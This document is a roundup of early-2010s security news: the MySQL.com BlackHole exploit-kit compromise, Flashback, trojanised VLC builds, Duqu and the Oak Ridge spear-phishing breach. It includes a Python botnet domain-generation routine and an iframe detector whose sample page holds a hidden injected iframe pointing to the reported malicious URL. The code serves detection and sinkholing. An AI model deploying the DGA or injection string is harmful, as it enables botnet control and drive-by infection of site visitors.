MySQL.com has been compromised and is triggering malware warnings for its visitors. MySQL is one of the most widely used relational database systems; by a common estimate, six out of ten database-backed websites use it. Mysql.com was also hacked earlier through a SQL injection vulnerability in the website itself. According to a blog post by Armorize, mysql.com has been hacked and is currently serving malware. Armorize detected the compromise through its website malware monitoring platform HackAlert and analysed how the compromise of the site's visitors unfolds: the mysql.com pages are injected with a script that generates an iframe, which silently redirects visitors to http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php, where the BlackHole exploit pack is hosted.

According to the researchers:
“It exploits the visitor’s browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java,), and upon successful exploitation, permanently installs a piece of malware into the visitor’s machine, without the visitor’s knowledge,”
Armorize also released a video demonstrating the attack.


2011 "The Year of The Hack" A Brief Over View & Prediction of 2012


Every day when you open voiceofgreyhat.com you see lots of hacks, defacements, data breaches, rooted servers, hacked databases, leaked information and so on. Here is a summary covering the recent attacks. If 2011 was “the year of the hack,” as Richard Clarke, former White House cyber-security czar, dubbed it, will 2012 be the year enterprises apply the lessons learned and stop the attacks?

Apparently not, as security experts are predicting even more sophisticated attacks for 2012. 

Defense contractors, government agencies, and other public and private organizations reported network breaches where attackers stole intellectual property, financial data and other sensitive data. Hacktivist groups such as Anonymous and LulzSec demonstrated how much damage they can cause large organizations by employing fairly well-known techniques against the application layer. 

What’s the security outlook for 2012? 
It appears gloomy, as security experts warn that cyber-attackers will target applications, mobile devices and social networking sites. There will be more social engineering, with attackers researching victims beforehand to craft even more targeted attacks.
2011 was a year in transition, the year when sophisticated Web application attacks came of age, said David Koretz, CEO of Mykonos Software. Before, people talked about the threat to Web applications but were unable to quantify the problem. “2011 is the year people started caring about Web security for the first time,” Koretz said.
Attackers targeted applications through SQL injection and cross-site scripting attacks to get access to sensitive data, said Lori MacVittie, senior technical marketing manager at F5 Networks. More kits and exploit tools are being released that target specific vulnerabilities, making it easier for even less-skilled attackers to launch sophisticated attacks. There will be more of these tools in 2012, she said.
Social media has become more ubiquitous. Forrester estimated 76 percent of enterprises allow some access to social networking sites from within the corporate networks,  and 41 percent allow “unfettered access” to these sites. Many of the data breach and cyber-attack headlines in 2011 were social engineering attacks that exploited email and the Web as an attack vector, according to Rick Holland, a Forrester analyst.
Attacks against social network sites accounted for only 5 percent of total social engineering attacks in Verizon’s 2011 Data Breach Investigations Report. Forrester expects this number to “increase significantly” in 2012, Holland said.
Malware for mobile platforms grabbed headlines in 2011, starting with Google removing apps infected with DroidDream malware from Android Market and then remotely removing them from user devices.
Malware developed for mobile platforms exploded in volume and sophistication, according to Juniper Networks’ Global Threat Center. Criminals released a mobile version of the Zeus Trojan (ZitMo) for several mobile platforms, designed to intercept the SMS transaction codes banks use as a second factor for online banking. Many users were infected with malware that turned their smartphones into zombies participating in a botnet without their knowledge.
Mobile device adoption is on track to reach 60 million tablets and 175 million smartphones in the workforce by 2012, according to Forrester. The majority of users will not be using these devices secured within the corporate environment as they will be working from home offices, public hotspots and third-party networks.
Organizations will increasingly shift their content security operations to the cloud to better protect mobile users. Security professionals have to adapt quickly to multiple mobile form factors and evolving threats from sophisticated malware and social networks, Holland said. 


Flashback Botnet Originated From Hacked & Malware-rigged WordPress Sites -Said Researchers

The massive Flashback botnet that hit more than 600,000 Macs worldwide originated from hacked, malware-rigged WordPress blog sites. Researchers estimate that between 30,000 and 100,000 WordPress sites were infected in late February and early March, 85% of them in the United States.
Kaspersky Lab researchers say the infected WordPress sites were rigged with code that silently redirected visitors to a malicious server. "When the connection was made to the malicious server, that server would determine which OS was running and serve exploits accordingly," says Roel Schouwenberg, senior researcher at Kaspersky. It was a pay-per-install scheme to spread malware, including the Flashback Trojan.
Most researchers say a gradual decline in machines infected by the Trojan is still underway: as of Thursday there were about 140,000 infected Macs still out there, according to Symantec, and Kaspersky sees only about 30,629 Flashback-infected bots in its sinkhole. Still on the horizon is the possibility of a Flashback comeback, with the command-and-control servers pushing updates to their bots. "We are watching the command-and-control domains used to control this botnet for any updates ... We haven't seen any new updates being delivered," said Liam O Murchu, manager of operations for Symantec Security Response. "Flashback generates new domains every day, which shows us the attackers have probably written malicious code before. They are aware that their botnet could be taken down with a single domain, so they generate a new one every day."
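O Murchu's remark about Flashback generating new command-and-control domains every day describes a domain generation algorithm (DGA). The block below is an added example, not Flashback's actual algorithm, which the post does not describe: a generic date-seeded DGA of the kind he refers to, with an assumed family seed and TLD list, plus the defender-side step of precomputing upcoming domains so they can be registered or blocked ahead of the bots, which is how a sinkhole like the one mentioned above collects infected machines.

```python
"""Generic date-seeded domain generation algorithm (DGA) and the defender's
counter-move.  Added example; NOT Flashback's real algorithm, which the post does
not describe.  The family seed and TLD list are assumptions."""
import hashlib
from datetime import date, timedelta
from typing import Dict, List

SEED = b"example-bot-family"          # assumed constant compiled into the bot
TLDS = ("com", "net", "org", "info")  # assumed
LABEL_LEN = 12


def daily_domains(day_iso: str, count: int = 5, seed: bytes = SEED) -> List[str]:
    """Domains a bot tries on calendar day `day_iso` (YYYY-MM-DD).

    Deterministic: every bot, and every analyst holding the seed, derives the same
    list for a given day and a different list the next day, so seizing today's
    domain does not stop tomorrow's rendezvous."""
    day = date.fromisoformat(day_iso)          # validates the input
    domains = []
    for i in range(count):
        digest = hashlib.sha256(seed + day.isoformat().encode() + bytes([i])).digest()
        # 12 lowercase letters from the hash, TLD chosen by the last byte
        label = "".join(chr(ord("a") + b % 26) for b in digest[:LABEL_LEN])
        domains.append(f"{label}.{TLDS[digest[-1] % len(TLDS)]}")
    return domains


def sinkhole_schedule(start_iso: str, days_ahead: int, count: int = 5) -> Dict[str, List[str]]:
    """Defender side: precompute the next `days_ahead` days of candidates so they
    can be registered (sinkholed) or blocked before the bots ask for them."""
    start = date.fromisoformat(start_iso)
    schedule: Dict[str, List[str]] = {}
    for offset in range(days_ahead):
        day = (start + timedelta(days=offset)).isoformat()
        schedule[day] = daily_domains(day, count)
    return schedule


if __name__ == "__main__":
    for day, domains in sinkhole_schedule(date.today().isoformat(), 3).items():
        print(day, ", ".join(domains))
```

The defender's advantage is entirely in the seed: once an analyst has extracted it from a sample, every future rendezvous point is known in advance, and whoever registers those names first, attacker or sinkhole operator, owns the bots for that day. That is why a single domain seizure does not end a DGA botnet, and why O Murchu's team keeps watching the generated domains for fresh updates.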


Mac users have faced such attacks before. Earlier this year the Mac Trojan OSX.SabPub spread through Java exploits. In 2011 the OSX/Revir-B Trojan was installed behind a decoy PDF, giving attackers remote access to Mac computers; a Mac port of the Linux "Kaiten" Tsunami IRC bot targeted Mac OS users the same year; and the "DevilRobber" malware also victimised Mac users by stealing their personal information.


VLC is Giving Malware Alert While Downloading


VLC Player by VideoLAN is without doubt one of the best and most popular media players available for Windows, Mac and Linux. Being open source software, the source code of VLC is available to everyone. It is now being reported, however, that a few fraudulent companies are abusing the source code and distributing builds infected with malware. They modify the source, inject their own malware into the player, and then make it available for download through various channels. Users think they are getting the legitimate software but receive the infected version, which either does not work or spreads malware on their systems. 
What makes this worse is that these companies have enough money for Google AdWords accounts, so they can buy advertising on the Internet and expand their reach. Many have even registered "official-sounding" domains that trick users into believing they are downloading from the official website. Ludovic Fauvet, a VLC developer, says that his organization, being a non-profit, does not have the money to sue these companies, which are discrediting its work and violating the GPL license.
Users looking to download VLC are strongly advised to get it ONLY from the official website (link below), to be sure they have the authentic build that works properly and does not contain any malware.

-News Source (Crazy Engineers)


Account of the man who live tweeted Osama's death has been hacked


Security experts' warning that online scammers would seek to exploit the death of al-Qaida leader Osama bin Laden to spread malware has come true.

According to security firm Websense, the website of Sohaib Athar (@ReallyVirtual), the man who unknowingly gave a live ringside view of the bin Laden raid on the microblogging site Twitter, has been hacked.

Websense discovered that Athar's website has been compromised and leads to the Blackhole exploit kit. This means web surfers who visited Athar's blog, Reallyvirtual.com, early on Monday may have had malware silently installed on their computers.

According to Websense, "Anyone going to this page would also load content from the malicious URL ..., and the Blackhole Exploit Kit would then try to use several exploits to automatically install malware on the PC."

The malware that the drive-by download attempts to install is a fake system tool named 'WindowsRecovery' that claims to have found problems on the victim's computer. To convince the user that something really is wrong with the system, the malware hides all files and folders on the hard drives and on the desktop, Websense says in its blog post.

And, not surprisingly, the scammers offer the user a quick solution to this problem: purchase of the premium version of 'WindowsRecovery', the blog post adds.
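This post and the MySQL.com compromise above describe the same drive-by pattern: a trusted site is injected with a script that silently loads an off-site page hosting the Blackhole exploit kit, typically through a hidden iframe written by document.write(unescape(...)). The block below is an added example, not Armorize's HackAlert or Websense's detection code. It expands such document.write() calls, parses the resulting markup and flags off-site iframes that are hidden or zero-sized. The sample page is constructed for the demonstration; its redirect target is the URL reported in the MySQL.com post.

```python
"""Flag hidden, off-site iframes in a page, including ones an injected script
assembles with document.write(unescape(...)).  Added example, not Armorize's
HackAlert or Websense's code.  SAMPLE_PAGE is constructed for the demonstration;
its redirect target is the URL reported in the MySQL.com post."""
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import unquote, urlsplit

# Matches document.write('...') and document.write(unescape('...')); literals
# containing escaped quotes are beyond this simple matcher.
_WRITE_RE = re.compile(
    r"""document\.write\s*\(\s*(?:unescape\s*\(\s*)?(['"])(.*?)\1""", re.S)

# Constructed sample: one legitimate embed plus an injected, percent-encoded iframe
SAMPLE_PAGE = """<html><body>
<h1>MySQL :: The world's most popular open source database</h1>
<iframe src="http://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<script type="text/javascript">
document.write(unescape('%3Ciframe%20src%3D%22http%3A//truruhfhqnviaosdpruejeslsuy.cx.cc/main.php%22%20width%3D%220%22%20height%3D%220%22%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E'))
</script>
</body></html>"""


def expand_document_write(html: str) -> str:
    """Append the markup each document.write() would emit, decoding unescape()
    payloads, so a tag parser sees what the browser would render."""
    pieces = [html]
    for match in _WRITE_RE.finditer(html):
        literal = match.group(2)
        if "unescape" in match.group(0):
            literal = unquote(literal)      # %3C -> '<', %22 -> '"', ...
        pieces.append(literal)
    return "\n".join(pieces)


class _IframeCollector(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.iframes: List[Dict[str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def _is_hidden(attrs: Dict[str, str]) -> bool:
    """Zero/one-pixel box or CSS that hides the frame: the classic injection shape."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = all(attrs.get(dim, "").strip().rstrip("px") in ("0", "1")
               for dim in ("width", "height"))
    return tiny or "display:none" in style or "visibility:hidden" in style


def find_injected_iframes(html: str, site_host: str) -> List[Dict[str, str]]:
    """Return off-site iframes that are hidden or zero-sized, with their target host."""
    collector = _IframeCollector()
    collector.feed(expand_document_write(html))
    hits = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = urlsplit(src).hostname or site_host   # relative src stays on-site
        if host != site_host and _is_hidden(attrs):
            hits.append({"src": src, "host": host, "reason": "hidden off-site iframe"})
    return hits


if __name__ == "__main__":
    for hit in find_injected_iframes(SAMPLE_PAGE, "www.mysql.com"):
        print(f"{hit['reason']}: {hit['src']}")
```

Real injections also split strings, go through eval, or stage the iframe from a second script load, so the expander is a first filter rather than a complete deobfuscator. Anything it flags is worth fetching with a non-browser client from an isolated machine, because exploit kits such as Blackhole fingerprint the visitor and serve different payloads to different browsers and plugin versions.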


Microsoft Working To Patch New 0-day Windows Kernel Vulnerability Associated With Duqu

 
Microsoft confirmed on Tuesday that it is working to patch a flaw exploited by the Duqu malware. Security researchers discovered a previously unknown Windows kernel vulnerability while analysing the infamous Duqu malware. CrySyS, the group that originally discovered the malware, warned on Tuesday that Duqu's installer is a dropper document containing a Microsoft 0-day kernel exploit (a TrueType font-parsing flaw in the win32k.sys driver, CVE-2011-3402). Opening the document lets the attacker execute code with kernel privileges on the victim's system. Microsoft confirmed the vulnerability on Tuesday and is working on a security advisory for the issue. “We are working to address a vulnerability believed to be connected to the Duqu malware,” said a Microsoft spokesperson. The software giant is expected to issue a full security bulletin shortly.



Top Government Lab Hacked

A top United States federal lab was the victim of a "silent" cyberattack earlier this month, news outlets are reporting.
The Oak Ridge National Laboratory in Tennessee was the victim, according to Nextgov.com. The lab is a Department of Energy laboratory that studies nuclear fusion, supercomputing and other areas. Ironically, "one of the core competencies of the lab is cybersecurity research," according to a quote on Wired. The attack prompted a shutdown of e-mail and Internet access at the facility.
The attack vector used to break into Oak Ridge's network is known as an advanced persistent threat, or APT. Nextgov describes it thus: "APTs typically infiltrate a target by e-mailing its employees messages purportedly from legitimate associates that ask the employee to submit personal information, such as passwords, and then harvest this information to access the systems they are after. Once inside the network, the perpetrators often try to extract data -- perhaps proprietary designs or classified information."
Wired provides more details of the attack:
According to Zacharia, the intrusion came in the form of a spear-phishing email sent to lab employees on April 7. The e-mail, purportedly sent from the human resources department, discussed employee benefits and included a link to a malicious web page, where malware exploited the IE vulnerability to download additional code to users’ machines.
The attackers cast their net wide in the company, but hooked only two computers in the phishing scheme, Zacharia said. About 530 employees received the e-mail — out of about 5,000 workers — but only 57 people clicked on the malicious link in the correspondence. Out of this, only two machines got infected with the malware.
The lab began to block the malicious emails soon after they began coming in, but it was already too late. On April 11, administrators discovered a server had been breached when data began leaving the network. Workers cleaned up the infected system, but early Friday evening “a number of other servers suddenly [went] active with the malware,” Zacharia said. The malware had apparently lain dormant for a week before it awoke on those systems. That’s when the lab blocked internet access.
Zacharia said the malware “masked itself” on systems and was designed to erase itself if it tried to compromise a system and was unsuccessful.

